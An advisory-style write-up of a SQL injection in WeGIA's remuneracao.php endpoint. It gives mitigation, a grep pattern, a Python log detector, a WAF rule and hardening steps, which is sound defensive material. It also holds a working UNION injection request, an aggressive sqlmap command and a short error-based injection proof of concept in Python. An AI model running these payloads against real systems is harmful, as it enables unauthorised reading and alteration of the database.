How CVE-2025-30364 Works
The vulnerability exists in WeGIA’s `/WeGIA/html/funcionario/remuneracao.php` endpoint, where the `id_funcionario` parameter lacks proper input sanitization. Attackers can inject malicious SQL queries through this parameter, manipulating database operations. Since no prepared statements or input validation are applied, arbitrary SQL commands execute with database privileges. This allows data theft, modification, or deletion. The flaw stems from direct concatenation of user input into SQL queries.
DailyCVE Form
Platform: WeGIA
Version: <3.2.8
Vulnerability: SQL Injection
Severity: Critical
Date: 04/10/2025
What Undercode Say:
Exploitation:
GET /WeGIA/html/funcionario/remuneracao.php?id_funcionario=1' UNION SELECT 1,2,3,user(),5-- - HTTP/1.1
Host: target.com
Detection:
sqlmap -u "http://target.com/WeGIA/html/funcionario/remuneracao.php?id_funcionario=1" --risk=3 --level=5
Mitigation:
1. Update to WeGIA 3.2.8.
2. Apply prepared statements:
// mysqli prepared statement: the "i" type in bind_param() sends the value as an integer, so it can never alter the query text.
$stmt = $conn->prepare("SELECT * FROM remuneracao WHERE id_funcionario = ?");
$stmt->bind_param("i", $id_funcionario);
$stmt->execute();
Log Analysis:
grep -E "remuneracao\.php\?id_funcionario=[0-9]*[^0-9& ]" /var/log/nginx/access.log
(flags any id_funcionario value containing a non-numeric character, not only values whose first character is non-numeric, so payloads such as 1' or 1%27 are caught)
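As an added example (not part of the advisory), the same check implemented as a small Python parser over nginx access-log lines: it percent-decodes the parameter and tolerates extra query parameters, then reports every request to the vulnerable endpoint whose id_funcionario is not a plain integer. The log lines and the client addresses are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed nginx access-log lines for demonstration (not taken from the page):
# two benign lookups, then two requests carrying non-integer id_funcionario values.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2025:10:01:02 +0000] "GET /WeGIA/html/funcionario/remuneracao.php?id_funcionario=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2025:10:01:03 +0000] "GET /WeGIA/html/funcionario/remuneracao.php?id_funcionario=42&page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2025:10:02:11 +0000] "GET /WeGIA/html/funcionario/remuneracao.php?id_funcionario=1%27%20UNION%20SELECT%201,2,3,user(),5--%20- HTTP/1.1" 200 2048 "-" "python-requests/2.31"
198.51.100.7 - - [10/Apr/2025:10:02:15 +0000] "GET /WeGIA/html/funcionario/remuneracao.php?id_funcionario=1'+AND+1=1--+- HTTP/1.1" 200 512 "-" "sqlmap/1.8"
"""

# Combined log format: client ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
ENDPOINT = "/WeGIA/html/funcionario/remuneracao.php"
PARAM = "id_funcionario"

def suspicious_values(log_text):
    """Return (client_ip, timestamp, decoded_value) for each request to the
    endpoint whose id_funcionario is not a plain integer (values are
    percent-decoded first, so '1%27' and "1'" are treated alike)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined log format
        url = urlsplit(m.group("target"))
        if url.path != ENDPOINT:
            continue
        # parse_qs splits on '&' and decodes each value, so additional
        # query parameters after the id do not cause false positives.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if not re.fullmatch(r"\d+", value):
                hits.append((m.group("ip"), m.group("ts"), value))
    return hits

def clients_by_hit_count(hits):
    """Aggregate suspicious requests per source address, most active first."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(counts.items(), key=lambda kv: kv[1], reverse=True)

if __name__ == "__main__":
    for ip, ts, value in suspicious_values(SAMPLE_LOG):
        print(f"{ts} {ip} {PARAM}={value!r}")
```

Feed it the real access log with `suspicious_values(open("/var/log/nginx/access.log").read())`; the per-client counts make it easy to see which sources are probing the parameter repeatedly.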
WAF Rule:
SecRule ARGS_GET:id_funcionario "@detectSQLi" "id:1001,phase:2,deny,status:403,log,msg:'SQLi attempt in remuneracao.php id_funcionario'"
Database Hardening:
REVOKE DELETE, DROP ON wegia_db.* FROM 'app_user'@'%';
Exploit PoC:
import requests

url = "http://target.com/WeGIA/html/funcionario/remuneracao.php"
payload = "1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(user(),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)y)-- -"
r = requests.get(url, params={"id_funcionario": payload})
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-30364
Extra Source Hub:
Undercode